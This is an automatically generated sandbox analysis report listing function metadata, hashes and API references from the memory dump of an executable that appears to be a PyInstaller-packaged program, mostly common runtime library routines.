                                                                                                                                                                        • Part of subcall function 00007FF6313D8A90: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
                                                                                                                                                                      • _findclose.LIBCMT ref: 00007FF6313D7F49
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2772937645-0
                                                                                                                                                                      • Opcode ID: 57151f018b2aaccc585e5652e51fbd64895772c6a2ebb2f952775244d57fa877
                                                                                                                                                                      • Instruction ID: 48ed1084e347337d49c489e5fea76406b0f198cba4fd72eebe3e44c78ca4f5d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 57151f018b2aaccc585e5652e51fbd64895772c6a2ebb2f952775244d57fa877
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E715953E18AC581EB218B2CD5052FD6360FBA9B4CF55E321DB9C52692EF38E2D9C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EC31C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 0f81d7c0ab4aef1fc6aa925a0828f2714494c290b473dbacdd844052ec445c74
                                                                                                                                                                      • Instruction ID: 03b4e4f762242e4d0f251e8fde903c8ade8f55112b23e9e0554441c68ff406cb
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f81d7c0ab4aef1fc6aa925a0828f2714494c290b473dbacdd844052ec445c74
                                                                                                                                                                      • Instruction Fuzzy Hash: 96419A33D0834587FB249A29A5402BD77A1EB55B90F142231DA8AC37D5CF3CEA02EB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8260 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                      • Opcode ID: bab311979b83b2973ab1d89e9b67bc8ccda33c15df6cb7365b3a0b162b306b4b
                                                                                                                                                                      • Instruction ID: 9e1c1b794cac304622b9d0fea5d178e07c58b819e3de3b087b4a7b16867b2297
                                                                                                                                                                      • Opcode Fuzzy Hash: bab311979b83b2973ab1d89e9b67bc8ccda33c15df6cb7365b3a0b162b306b4b
                                                                                                                                                                      • Instruction Fuzzy Hash: AD21AD26F083928AFB549A2269047FAA641FF45FD4F885070EE0C8B7A6CE3CF545D600
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EBDAC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 4fc26fdc08108ed44d7d55adeff722dd0293d64556b497ec72aef404f0094ea5
                                                                                                                                                                      • Instruction ID: 9efeb3264979f86c4306c55114c24d4792993cbdbebc8bc7b05aa2f6a4726177
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fc26fdc08108ed44d7d55adeff722dd0293d64556b497ec72aef404f0094ea5
                                                                                                                                                                      • Instruction Fuzzy Hash: E631B033E1970285F7525B6598413BC3650AF80B54F512135EA1D873D2CF7CEE42A7B1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E9DA1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: aba07eee115744d4194d0793d144bc296d8bcf5a44c2dbb7c3aefea511c1176d
                                                                                                                                                                      • Instruction ID: 3253ae8e2239289a300ebdb81bce27cab67b09135692311f42e3f337d61c846b
                                                                                                                                                                      • Opcode Fuzzy Hash: aba07eee115744d4194d0793d144bc296d8bcf5a44c2dbb7c3aefea511c1176d
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B217C32E047468AFB248F64C4402EC37A0EB84718F441635D7AD87BC5EF38DA95D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E6358 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 2d9ead00eaff111a2746de835e460df0b27a55040472c8608b554fecfd086cef
                                                                                                                                                                      • Instruction ID: cb7bf7b6ce33c9cbba045ed2be3391bfda6c3639f567d92dffe30368adedfe8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d9ead00eaff111a2746de835e460df0b27a55040472c8608b554fecfd086cef
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A116063E0D78181FF619F5194002BDA2A0BF85B84F546431EA8C9779ACF7DEE40A761
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F6B5C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 77e422677ed0f0292d92bddf94073a46de344efde8307fb90f807d340dc124d1
                                                                                                                                                                      • Instruction ID: 08e4884adde2acaff532e88225906a0c35be8543433dde557b4b38c2e25e8efa
                                                                                                                                                                      • Opcode Fuzzy Hash: 77e422677ed0f0292d92bddf94073a46de344efde8307fb90f807d340dc124d1
                                                                                                                                                                      • Instruction Fuzzy Hash: 17216272E18A4586EB618F19D44037977A1EB84B94F144234EAADC77D9DF3DD8019B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E04AC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: ee54c206e1a887ae3f5b6e147e49aa8ebcc01f78c4b161cd5f93b6e21ddd325d
                                                                                                                                                                      • Instruction ID: 0ba129e82b98d9d619d59b41fd945a0acc4546549ac28691c75f3cb744223126
                                                                                                                                                                      • Opcode Fuzzy Hash: ee54c206e1a887ae3f5b6e147e49aa8ebcc01f78c4b161cd5f93b6e21ddd325d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6301C466F0874181FB04DB6699001BDA691BF85FE0F086630EE5C97BD6CE3CEA019710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E7960 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 959c86efac7ac107e163256595c94b96b37ac56cf16d627dd6117a938704b6cd
                                                                                                                                                                      • Instruction ID: 56aec7c29b12034ab78dae9866e39cd856c008c61eec9058ab0de63b299412ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 959c86efac7ac107e163256595c94b96b37ac56cf16d627dd6117a938704b6cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E019E22E0C74381FF646B62A5412B961D0AF447A0F146635FA2CC27D6DF3CAE52A3A1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EF008 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6313EB856,?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2), ref: 00007FF6313EF05D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: d2154baaab5edae7bc7907bf5257eb9f528b57456f95640f52a2cb754ca5723e
                                                                                                                                                                      • Instruction ID: 074fca2b02422ddb60ffe4191de3245973dbee9c6848aa8daa468c819d8a4664
                                                                                                                                                                      • Opcode Fuzzy Hash: d2154baaab5edae7bc7907bf5257eb9f528b57456f95640f52a2cb754ca5723e
                                                                                                                                                                      • Instruction Fuzzy Hash: 06F01D56F0970B81FF556B6258112B556995F48BC0F4C6430DD0EC67C2EEBCEE85A230
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EDA6C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF6313E0CD4,?,?,?,00007FF6313E21E6,?,?,?,?,?,00007FF6313E37D9), ref: 00007FF6313EDAAA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: ac7f90ef84a43579440295641893f664450049ee933c546221e404ff14d7af2e
                                                                                                                                                                      • Instruction ID: 67a67b89506c6c0bf6efd455b3a9eb5edcf71c1fa714a4e9df1fb5ee673e186c
                                                                                                                                                                      • Opcode Fuzzy Hash: ac7f90ef84a43579440295641893f664450049ee933c546221e404ff14d7af2e
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF01C16F1D34785FF6467B25C016B912905F54BA0F096630ED2EC63C6DEBCEB41A230
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E7C9C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 6d56955c9c81706069cc343df1e629214711a864640335e79fef0628d15a0890
                                                                                                                                                                      • Instruction ID: e65a265ab4b368a95b29550f3dc8a428713c3280cbf293d5de8d291d0e3c5261
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d56955c9c81706069cc343df1e629214711a864640335e79fef0628d15a0890
                                                                                                                                                                      • Instruction Fuzzy Hash: E5E0EC66E0874782FF657AA04D821B921144F14740F147034EA088A383DD3D6E59B772
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8390 Relevance: 1.3, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 377330604-0
                                                                                                                                                                      • Opcode ID: a4f4f863bbf95936c632da63c180b93ee955cabe46756af888466d1a6332f086
                                                                                                                                                                      • Instruction ID: f7895822ea831bd7ea2efbcc111916847341c54a9ef2dd50180e39f4e425e615
                                                                                                                                                                      • Opcode Fuzzy Hash: a4f4f863bbf95936c632da63c180b93ee955cabe46756af888466d1a6332f086
                                                                                                                                                                      • Instruction Fuzzy Hash: A1418F16E1C6C581FB119B2895112FD2370FFA5B84F44A276DB8D922A3EF38B6D89300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF6313D5190 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
